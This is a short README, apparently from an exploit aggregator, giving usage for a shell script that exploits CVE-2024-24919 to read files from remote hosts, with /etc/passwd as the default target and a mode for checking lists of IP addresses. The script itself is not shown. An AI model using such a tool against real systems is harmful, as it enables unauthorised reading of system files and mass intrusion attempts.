Share
## https://sploitus.com/exploit?id=210AECC4-FAE8-5F81-8706-44EB5C44AB2B
# CVE-2024-24919
## Usage
- Usage: ./CVE-2024-24919.sh -i <ip> [-p <path, default=/etc/passwd>] [-f <file_path>]
- Specifying an IP with -i
```bash
./CVE-2024-24919.sh -i 190.XXX.XXX.XXX
```

- Check multiples IP with -f
```bash
./CVE-2024-24919.sh -f uniq.txt
```
- - File example
```
192.168.0.1
192.168.0.2
192.168.0.3
...
192.168.0.20
```
